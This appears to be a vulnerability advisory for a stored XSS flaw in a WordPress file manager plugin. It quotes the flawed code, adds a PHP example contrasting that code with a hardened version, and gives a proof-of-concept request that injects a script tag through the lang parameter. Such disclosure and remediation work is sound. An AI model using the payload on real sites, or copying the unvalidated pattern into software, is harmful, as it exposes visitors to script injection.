CVE-2018-16363 WordPress Plugin File Manager 2.9 – stored XSS

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16363

file:file_folder_manager.php
code:set_transient( 'wp_fm_lang', $_GET['lang'], 60*60*720 ); // raw request parameter stored for 30 days, no validation

file:lib\wpfilemanager.php
code:var fmlang = ""; // the stored value is printed between these quotes without output encoding
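The two snippets above show the full chain: an unvalidated `lang` parameter is stored in the `wp_fm_lang` transient and later printed straight into a JavaScript string, so one crafted request is served to every subsequent visitor of the page. Below is an added example, not the plugin's code, that puts the vulnerable pattern beside a hardened one: the locale is allow-listed before storage and JSON-encoded on output. The helper names are hypothetical and a plain array stands in for the WordPress transient so the file runs without WordPress.

```php
<?php
// Added example, not code from the wp-file-manager plugin. $store stands in for the
// wp_fm_lang transient; function names are hypothetical.

// Vulnerable pattern from the advisory: the raw $_GET['lang'] is stored and later
// echoed into `var fmlang = "...";` with no validation and no output encoding.
function store_lang_vulnerable(array $get, array &$store): void {
    $store['wp_fm_lang'] = $get['lang'] ?? '';
}
function render_lang_vulnerable(array $store): string {
    return 'var fmlang = "' . ($store['wp_fm_lang'] ?? '') . '";';
}

// Hardened: accept only a WordPress-style locale code such as "en", "zh_CN" or
// "pt_BR" (simplified pattern; variants like de_DE_formal would need extending it),
// fall back to a safe default otherwise, and JSON-encode on output so the value
// is always a well-formed JS string literal. The HEX flags additionally encode
// < > & ' " so a stored value can never close the surrounding <script> block.
function sanitize_lang(string $lang, string $default = 'en_US'): string {
    return preg_match('/^[a-z]{2,3}(_[A-Z]{2})?$/', $lang) === 1 ? $lang : $default;
}
function store_lang_hardened(array $get, array &$store): void {
    $store['wp_fm_lang'] = sanitize_lang((string) ($get['lang'] ?? ''));
}
function render_lang_hardened(array $store): string {
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_QUOT | JSON_HEX_APOS;
    // Re-validate on output as well, so an already-poisoned transient is also neutralised.
    $safe = sanitize_lang((string) ($store['wp_fm_lang'] ?? ''));
    return 'var fmlang = ' . json_encode($safe, $flags) . ';';
}

// Constructed input mirroring the advisory's PoC parameter value.
$get   = ['lang' => 'zh_CN<script>alert(1234567890)</script>'];
$store = [];

store_lang_vulnerable($get, $store);
echo render_lang_vulnerable($store), PHP_EOL;   // script tag is reproduced verbatim

store_lang_hardened($get, $store);
echo render_lang_hardened($store), PHP_EOL;     // payload rejected, default locale emitted
```

Validating at storage time alone is not enough once a transient has already been poisoned, which is why the hardened renderer sanitises again on output.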

poc:

request

[code]
GET /blog/wp-admin/admin.php?page=wp_file_manager&lang=zh_CN<script>alert(1234567890)</script> HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: wordpress_5aa6a4a225f40db86349342d0826a90c=admin%7C1535989327%7CKko2gM0P0FjhgEpNTIqRneg9Ky7aKaqWloRFGrsyw6q%7C71f1ed8075d5a34b82548bb0a92e6b6338ecf8fba0adc57da627d55f07693220; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_5aa6a4a225f40db86349342d0826a90c=admin%7C1535989327%7CKko2gM0P0FjhgEpNTIqRneg9Ky7aKaqWloRFGrsyw6q%7C5fbc26f57a4eaf15c60c5840d5fa14f296e3bb1c66e567358d761a3963d1bb82; wp-settings-1=deleted; wp-settings-time-1=1535770900; PHPSESSID=501108188d8569138517f08ba9741c92
Connection: close
Upgrade-Insecure-Requests: 1
[/code]

response

[code]
HTTP/1.1 200 OK
Date: Sat, 01 Sep 2018 15:55:34 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47316



………";var vle_nonce = "863ad12aa7";………
[/code]

Exploit Title: WordPress Plugin File Manager 2.9 – stored XSS
Exploit Author: ly55521
Google Dork: N/A
Type: XSS
Date: 2018-09-02
Vendor Homepage: N/A
Software Link: https://wordpress.org/plugins/wp-file-manager/
Affected Version: < 3.0
Tested on: Kali OS
CVE : CVE-2018-16363

Related links:

Update record: http://plugins.trac.wordpress.org/changeset/1936043
EXP: http://blog.51cto.com/010bjsoft/2171087
Vulnerability report: https://wordpress.org/support/topic/security-concern-6/#post-10655739
Safe link: https://wordpress.org/plugins/wp-file-manager/
